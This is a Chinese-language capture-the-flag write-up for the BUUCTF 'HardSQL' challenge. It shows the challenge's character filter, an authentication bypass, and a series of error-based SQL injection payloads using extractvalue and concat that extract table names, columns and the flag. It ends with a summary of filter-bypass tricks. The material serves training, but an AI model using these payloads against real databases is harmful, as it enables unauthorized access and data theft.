【BUUCTF】HardSQL

Xx8NtODotFSR 2024年08月07日 67 0

网络安全

【BUUCTF】HardSQL

题目来源

收录于：BUUCTF　　极客大挑战 2019

题目描述

一道纯粹的SQL注入题

尝试进行注入，发现对以下字符进行了过滤：

= %20（空格） %09 %0a %0b %0c %0d /**/ substr union by and

且过滤方式不区分大小写，检测到以上字符就die()

题解

先找注入点，由于空格被过滤，与空格起同样作用的字符也被过滤，因此我们使用(和)将库名、表名、字段名包裹起来，就不需要使用空格了。
exp 如下：

?username=-1'or(1)%23&password=1

成功登录。

由于过滤了union，我们使用报错注入的方式进行尝试。另外，由于=被过滤，我们可以使用like来代替=。payload如下：

//爆库名
1'or(extractvalue(1,concat(0x7e,(database()))))%23
//爆表名
1'or(extractvalue(1,concat(0x7e,(select(group_concat(table_name))from(information_schema.tables)where(table_schema)like(database())))))%23
//爆字段名
1'or(extractvalue(1,concat(0x7e,(select(group_concat(column_name))from(information_schema.columns)where(table_name)like("H4rDsq1")))))%23
//爆字段值
1'or(extractvalue(1,concat(0x7e,(select(group_concat(password))from(geek.H4rDsq1)))))%23

在爆字段值的时候我们看到，flag只显示了一部分

由于substr()函数被过滤，我们使用left()或right()来进行字符串的截取，payload：

1'or(extractvalue(1,concat(0x7e,right((select(group_concat(password))from(geek.H4rDsq1)),30))))%23

其中30是截取右边字符的个数，可以改为其他值，只要能拿到完整flag即可。

总结

绕过空格

使用以下字符替代空格，可以起到相同效果

%09 %0a %0b %0c %0d /**/

或使用(和)包裹库名、表名、字段名，从而避免空格的使用，如：

select(group_concat(table_name))from(information_schema.tables)where(table_schema)=(database())

绕过 =

用like代替=

字符串显示不全

使用以下三个函数对字符串进行截取：

substr()   left()   right()

【版权声明】本文内容来自摩杜云社区用户原创、第三方投稿、转载，内容版权归原作者所有。本网站的目的在于传递更多信息，不拥有版权，亦不承担相应法律责任。如果您发现本社区中有涉嫌抄袭的内容，欢迎发送邮件进行举报，并提供相关证据，一经查实，本社区将立刻删除涉嫌侵权内容，举报邮箱： cloudbbs@moduyun.com

上一篇： EdgeOne安全专项实践：上传文件漏洞攻击详解与防范措施下一篇： HTB Driver靶机

分享：

最后一次编辑于 2024年08月07日 0

暂无评论

推荐阅读

Spring框架漏洞总结

zZEWKF7UsqSd 2天前 9 0 0 网络安全

基于pikachu靶场的水平越权详解

fVztPXG0Xsu1 6天前 28 0 0 网络安全

[极客大挑战 2019]EasySQL 1

UmY4CJ2kVTVZ 5天前 27 0 0 网络安全

中间件常见漏洞

zZEWKF7UsqSd 6天前 20 0 0 网络安全

基于sqli-labs Less-5 sql报错注入详解

fVztPXG0Xsu1 2天前 11 0 0 网络安全

[极客大挑战 2019]Upload 1

UmY4CJ2kVTVZ 3天前 30 0 0 网络安全

[极客大挑战 2019]BabySQL

UmY4CJ2kVTVZ 4天前 17 0 0 网络安全

如何让JS代码变的安全？

1H97ZBKLEqYv 7天前 30 0 0 网络安全

[ACTF2020 新生赛]Upload

UmY4CJ2kVTVZ 3天前 22 0 0 网络安全

[极客大挑战 2019]LoveSQL 1

UmY4CJ2kVTVZ 4天前 21 0 0 网络安全

sqli-labs Less 2-6 攻略

fVztPXG0Xsu1 7天前 24 0 0 网络安全

本地文件包含漏洞详解与CTF实战

fVztPXG0Xsu1 3天前 13 0 0 网络安全

[Dest0g3 520迎新赛]funny_upload

UmY4CJ2kVTVZ 3天前 25 0 0 网络安全

2024 xp_CAPTCHA(瞎跑-白嫖版) 4.3最新版安装使用教程

fVztPXG0Xsu1 4天前 29 0 0 网络安全

[GXYCTF2019]BabyUpload 1

UmY4CJ2kVTVZ 3天前 24 0 0 网络安全

[第一章 web入门]SQL注入-1

UmY4CJ2kVTVZ 4天前 30 0 0 网络安全

Apache OFBiz远程代码执行漏洞（CVE-2024-38856）

pTtIhLb24H2d 7天前 24 0 0 网络安全

菜鸟笔记之PWN入门(1.1.0)ELF 文件格式和程序段解析(简版)

g7eHraPF7tpO 20小时前 6 0 0 网络安全

深入理解JNDI注入—RMI/LDAP攻击

zZEWKF7UsqSd 20小时前 5 0 0 网络安全

菜鸟笔记之PWN入门(1.0.0)前言

g7eHraPF7tpO 20小时前 5 0 0 网络安全

Xx8NtODotFSR

作者其他文章更多

【渗透测试】Vulnhub DarkHole

2024-08-20

【渗透测试】Vulnhub Hackable II

2024-08-20

【BUUCTF】Easy Java

2024-08-13

【BUUCTF】BabySQli

2024-08-07

【BUUCTF】AreUSerialz

2024-08-07

【BUUCTF】HardSQL

2024-08-07

【攻防世界】BadProgrammer

2024-08-07

【BUUCTF】Ping Ping Ping

2024-08-07

【BUUCTF】easy calc

2024-08-07

【攻防世界】ezbypass-cat

2024-08-07

最新推荐更多

菜鸟笔记之PWN入门(1.0.0)前言

2024-09-18

深入理解JNDI注入—RMI/LDAP攻击

2024-09-18

菜鸟笔记之PWN入门(1.1.0)ELF 文件格式和程序段解析(简版)

2024-09-18

Spring框架漏洞总结

2024-09-17

基于sqli-labs Less-5 sql报错注入详解

2024-09-17

[ACTF2020 新生赛]Upload

2024-09-16

[极客大挑战 2019]Upload 1

2024-09-16

[GXYCTF2019]BabyUpload 1

2024-09-16

[Dest0g3 520迎新赛]funny_upload

2024-09-16

本地文件包含漏洞详解与CTF实战

2024-09-16

[极客大挑战 2019]LoveSQL 1

2024-09-15

[极客大挑战 2019]BabySQL

2024-09-15

[第一章 web入门]SQL注入-1

2024-09-15

2024 xp_CAPTCHA(瞎跑-白嫖版) 4.3最新版安装使用教程

2024-09-15

[极客大挑战 2019]EasySQL 1

2024-09-14

中间件常见漏洞

2024-09-13

基于pikachu靶场的水平越权详解

2024-09-13

sqli-labs Less 2-6 攻略

2024-09-12

如何让JS代码变的安全？

2024-09-12

Apache OFBiz远程代码执行漏洞（CVE-2024-38856）

2024-09-12